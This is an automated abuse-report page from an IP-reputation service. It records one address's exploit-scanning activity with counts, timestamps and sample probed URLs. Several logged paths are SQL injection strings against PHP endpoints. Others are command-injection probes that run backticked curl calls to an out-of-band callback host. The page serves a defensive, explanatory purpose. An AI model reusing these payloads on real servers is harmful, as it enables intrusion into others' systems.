abuseip.org
- Reason
- suspicious paths across 1 domains
- Hits (last hour)
- 19
- Unique targets hit
- 1
- Unique paths probed
- 405
- Detection count
- 105
- First seen
- 2026-07-09 23:11:10 UTC
- Last seen
- 2026-07-10 00:10:42 UTC
- Block expires
- 2026-07-11 00:11:08 UTC
Sample paths probed
- /checkValid
- /manage/fileDownloader?sec=1
- /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl
- /login.htm
- /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23
- /convert
- /
- /admin/ajax.php?action=login
- /tos/index.php?explorer/pathList&path=%60curl+http%3a//d98158pqt5ls5ao75o70qrukp8we3cimj.dns.wt-oob-server.com+-H+'User-Agent%3a+9DUQaV'%60
- /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27
- /file/QXFx9k.txt
- /include/makecvs.php?Event=%60curl+http%3a//d98158pqt5ls5ao75o70fpgb7rjhkb1dg.dns.wt-oob-server.com+-H+'User-Agent%3a+9DUQaV'%60
- /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin
- /cgi-bin/system_mgr.cgi
- /public/css/3GHdTGA4H4yqlxB8wyIyB0nANBO.css
- /api/config
- /service/v1/createUser
- /carbon/generic/save_artifact_ajaxprocessor.jsp
- /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23
- /admin/index.php?page=home
Sample User-Agents
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse โ typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.